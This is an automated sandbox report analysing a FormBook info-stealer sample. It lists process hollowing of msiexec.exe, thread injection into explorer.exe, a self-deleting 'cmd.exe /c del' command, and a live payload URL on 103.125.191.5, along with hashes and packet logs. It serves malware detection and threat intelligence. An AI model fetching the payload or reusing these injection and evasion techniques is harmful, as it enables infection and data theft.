    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
    Modifies the context of a thread in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread register set: target process: 3424
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread register set: target process: 3424
    Queues an APC in another process (thread injection)Show sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeThread APC queued: target process: C:\Windows\explorer.exe
    Sample uses process hollowing techniqueShow sources
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeSection unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 1240000
    Source: C:\Users\user\Desktop\2eD17GZuWs.exeProcess created: C:\Users\user\Desktop\2eD17GZuWs.exe 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\2eD17GZuWs.exe'
    Source: explorer.exe, 0000000A.00000000.882628410.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Progman
    Source: explorer.exe, 0000000A.00000002.932560185.0000000001080000.00000002.00000001.sdmp, msiexec.exe, 0000000D.00000002.932857617.0000000003960000.00000002.00000001.sdmpBinary or memory string: Progmanlock
    Source: explorer.exe, 0000000A.00000000.896282281.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D

    Stealing of Sensitive Information:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY
    Yara detected Generic DropperShow sources
    Source: Yara matchFile source: Process Memory Space: 2eD17GZuWs.exe PID: 2936, type: MEMORY
    Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6680, type: MEMORY

    Remote Access Functionality:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.928588896.0000000002550000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.927894177.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000D.00000002.931871202.0000000001100000.00000040.00000001.sdmp, type: MEMORY

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsShared Modules1DLL Side-Loading1Process Injection412Virtualization/Sandbox Evasion21OS Credential DumpingSecurity Software Discovery621Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsDLL Side-Loading1Process Injection412LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSSystem Information Discovery21Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    2eD17GZuWs.exe25%VirustotalBrowse
    2eD17GZuWs.exe2%ReversingLabs

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://www.tiro.com0%URL Reputationsafe
    http://103.125.191.5/bin_xMjelaYnr43.binY0%Avira URL Cloudsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.goodfont.co.kr0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.carterandcone.coml0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.sajatypeworks.com0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.typography.netD0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://fontfabrik.com0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://www.founder.com.cn/cn0%URL Reputationsafe
    http://103.125.191.5/4%VirustotalBrowse
    http://103.125.191.5/0%Avira URL Cloudsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
    https://in_xMjelaYnr43.bin0%Avira URL Cloudsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.sandoll.co.kr0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.urwpp.deDPlease0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.zhongyicts.com.cn0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://www.sakkal.com0%URL Reputationsafe
    http://103.125.191.5/bin_xMjelaYnr43.bin0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://103.125.191.5/bin_xMjelaYnr43.bintrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
      		high
      http://www.fontbureau.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
        		high
        http://www.fontbureau.com/designersGexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
          		high
          http://www.fontbureau.com/designers/?explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
            		high
            http://www.founder.com.cn/cn/bTheexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.fontbureau.com/designers?explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
              		high
              http://www.tiro.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		unknown
              http://103.125.191.5/bin_xMjelaYnr43.binY2eD17GZuWs.exe, 00000001.00000002.928446229.0000000000924000.00000004.00000020.sdmpfalse
              • Avira URL Cloud: safe
              		unknown
              http://www.fontbureau.com/designersexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                		high
                http://www.goodfont.co.krexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.carterandcone.comlexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.sajatypeworks.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.typography.netDexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  		high
                  http://www.founder.com.cn/cn/cTheexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.galapagosdesign.com/staff/dennis.htmexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://fontfabrik.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.founder.com.cn/cnexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designers/frere-user.htmlexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    		high
                    http://103.125.191.5/2eD17GZuWs.exe, 00000001.00000002.928458563.000000000093D000.00000004.00000020.sdmpfalse
                    • 4%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    https://in_xMjelaYnr43.bin2eD17GZuWs.exe, 00000001.00000002.928394579.00000000008F7000.00000004.00000020.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://www.galapagosdesign.com/DPleaseexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.fontbureau.com/designers8explorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                      		high
                      http://www.%s.comPAexplorer.exe, 0000000A.00000002.935388452.0000000002B50000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://www.fonts.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        		high
                        http://www.sandoll.co.krexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.urwpp.deDPleaseexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.zhongyicts.com.cnexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://www.sakkal.comexplorer.exe, 0000000A.00000000.899103858.000000000B976000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown

                        Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public

                        IPDomainCountryFlagASNASN NameMalicious
                        103.125.191.5
                        		unknownViet Nam
                        		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

                        General Information

                        Joe Sandbox Version:31.0.0 Red Diamond
                        Analysis ID:320425
                        Start date:19.11.2020
                        Start time:10:47:26
                        Joe Sandbox Product:CloudBasic
                        Overall analysis duration:0h 8m 39s
                        Hypervisor based Inspection enabled:false
                        Report type:light
                        Sample file name:2eD17GZuWs.exe
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                        Number of analysed new started processes analysed:15
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:1
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • HDC enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Detection:MAL
                        Classification:mal100.rans.troj.spyw.evad.winEXE@8/0@0/1
                        EGA Information:Failed
                        HDC Information:
                        • Successful, ratio: 52% (good quality ratio 42.1%)
                        • Quality average: 65.4%
                        • Quality standard deviation: 37.1%
                        HCA Information:
                        • Successful, ratio: 69%
                        • Number of executed functions: 0
                        • Number of non-executed functions: 0
                        Cookbook Comments:
                        • Adjust boot time
                        • Enable AMSI
                        • Found application associated with file extension: .exe
                        Warnings:
                        Show All
                        • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                        • TCP Packets have been reduced to 100
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.

                        Simulations

                        Behavior and APIs

                        No simulations

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        103.125.191.5Unique food order.xlsxGet hashmaliciousBrowse
                        • 103.125.191.5/bin_xMjelaYnr43.bin

                        Domains

                        No context

                        ASN

                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                        VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNUnique food order.xlsxGet hashmaliciousBrowse
                        • 103.125.191.5
                        tt payment proof.xlsxGet hashmaliciousBrowse
                        • 103.125.191.187
                        TIE-3735-2020.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        payslip.s.xlsxGet hashmaliciousBrowse
                        • 103.125.191.187
                        Telex-relase.xlsxGet hashmaliciousBrowse
                        • 103.141.138.120
                        Y0L60XAhvo.rtfGet hashmaliciousBrowse
                        • 103.141.138.122
                        d6pj421rXA.exeGet hashmaliciousBrowse
                        • 103.139.45.59
                        8YPssSkVtu.rtfGet hashmaliciousBrowse
                        • 103.141.138.87
                        PI098763556299.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        PIT12425009.xlsxGet hashmaliciousBrowse
                        • 103.125.191.229
                        wIeFid8p7Q.exeGet hashmaliciousBrowse
                        • 103.125.189.164
                        Dell ordine-09362-9-11-2020.exeGet hashmaliciousBrowse
                        • 103.139.45.59
                        shipping documents.xlsxGet hashmaliciousBrowse
                        • 103.133.108.6
                        shipping documents.xlsxGet hashmaliciousBrowse
                        • 103.133.108.6
                        EES RFQ 60-19__pdf.exeGet hashmaliciousBrowse
                        • 103.114.107.156
                        Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                        • 103.141.138.122
                        Quotation_20CF18909.xlsxGet hashmaliciousBrowse
                        • 103.141.138.122
                        Z08LsyTAN6.exeGet hashmaliciousBrowse
                        • 103.125.189.164
                        QUO_M.VECOQUEEN.xlsx.docxGet hashmaliciousBrowse
                        • 103.125.191.123
                        R56D5hnFR3.rtfGet hashmaliciousBrowse
                        • 103.125.191.123

                        JA3 Fingerprints

                        No context

                        Dropped Files

                        No context

                        Created / dropped Files

                        No created / dropped files found

                        Static File Info

                        General

                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):4.914988096771549
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.15%
                        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:2eD17GZuWs.exe
                        File size:61440
                        MD5:c05eee88f0b57e853996957d6523397b
                        SHA1:fc16fa4ab9a88f7e2405eb9a77d168d9c1b7c8d3
                        SHA256:7e70e44956cdb045fd7b5c66eca50996900059fd8851aa76be19a5dd492c6918
                        SHA512:9441441f5d6d84e4c674e77013ce1bf562173195de9ac1c05463bcf0bbda51345b6af219b279f93e7d2df84bbfb22d11906b8a145f1fe98efaf3a28786be220f
                        SSDEEP:768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.......................*..............Rich....................PE..L......P.....................0....................@........

                        File Icon

                        Icon Hash:20047c7c70f0e004

                        Static PE Info

                        General

                        Entrypoint:0x401218
                        Entrypoint Section:.text
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                        DLL Characteristics:
                        Time Stamp:0x50B8A68A [Fri Nov 30 12:28:58 2012 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:823b3db4fa697cef327445c59300049d

                        Entrypoint Preview

                        Instruction
                        push 004019DCh
                        call 00007FA87CA2F933h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        xor byte ptr [eax], al
                        add byte ptr [eax], al
                        inc eax
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [edi], al
                        or al, C7h
                        stosd
                        pushfd
                        add bl, ah
                        inc esi
                        xchg eax, edi
                        sbb eax, A17D13C7h
                        popad
                        in eax, 00h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [ecx], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax+eax], al
                        add byte ptr [eax], al
                        popad
                        je 0000F9B5h
                        jns 00007FA87CA2F9ADh
                        imul esp, dword ptr [ebp+74h], 73h
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        add byte ptr [eax], al
                        dec esp
                        xor dword ptr [eax], eax
                        pop ds
                        mov ebp, AFADF0F4h
                        xchg eax, ebx
                        or byte ptr [ebp-54h], FFFFFFEDh
                        sub al, B9h
                        mov word ptr [edx+3BA912D4h], cs
                        cmc

                        Data Directories

                        NameVirtual AddressVirtual Size Is in Section
                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_IMPORT0xc3040x3c.text
                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf0000x8f8.rsrc
                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2300x30
                        IMAGE_DIRECTORY_ENTRY_IAT0x10000xac.text
                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                        Sections

                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                        .text0x10000xb6600xc000False0.449890136719data5.65312994467IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                        .data0xd0000x13bc0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                        .rsrc0xf0000x8f80x1000False0.16943359375data1.94217064888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                        Resources

                        NameRVASizeTypeLanguageCountry
                        RT_ICON0xf7c80x130data
                        RT_ICON0xf4e00x2e8data
                        RT_ICON0xf3b80x128GLS_BINARY_LSB_FIRST
                        RT_GROUP_ICON0xf3880x30data
                        RT_VERSION0xf1500x238dataEnglishUnited States

                        Imports

                        DLLImport
                        USER32.DLLHideCaret
                        MSVBVM60.DLL_CIcos, _adj_fptan, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, _adj_fdivr_m16i, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, _CIatan, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

                        Version Infos

                        DescriptionData
                        Translation0x0409 0x04b0
                        InternalNameLUKENES
                        FileVersion1.00
                        CompanyNameDynegy
                        CommentsDynegy
                        ProductNameaftrykkets
                        ProductVersion1.00
                        OriginalFilenameLUKENES.exe

                        Possible Origin

                        Language of compilation systemCountry where language is spokenMap
                        EnglishUnited States

                        Network Behavior

                        Snort IDS Alerts

                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                        11/19/20-10:49:58.574580TCP2018752ET TROJAN Generic .bin download from Dotted Quad4975680192.168.2.4103.125.191.5

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Nov 19, 2020 10:49:58.257344961 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.573558092 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.573877096 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.574579954 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.891490936 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891516924 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891535044 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891551971 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:58.891586065 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:58.891609907 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:59.207879066 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207909107 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207926035 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207943916 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207961082 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207978010 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.207998991 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.208019972 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:49:59.208074093 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:49:59.208142996 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.525682926 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525711060 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525722980 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525733948 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525783062 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525830030 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525904894 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525922060 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525938034 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525955915 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.525955915 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.525996923 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526000977 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526007891 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526009083 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526026964 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526060104 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526097059 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526108027 CET8049756103.125.191.5192.168.2.4
                        Nov 19, 2020 10:50:01.526155949 CET4975680192.168.2.4103.125.191.5
                        Nov 19, 2020 10:50:01.526177883 CET8049756103.125.191.5192.168.2.4
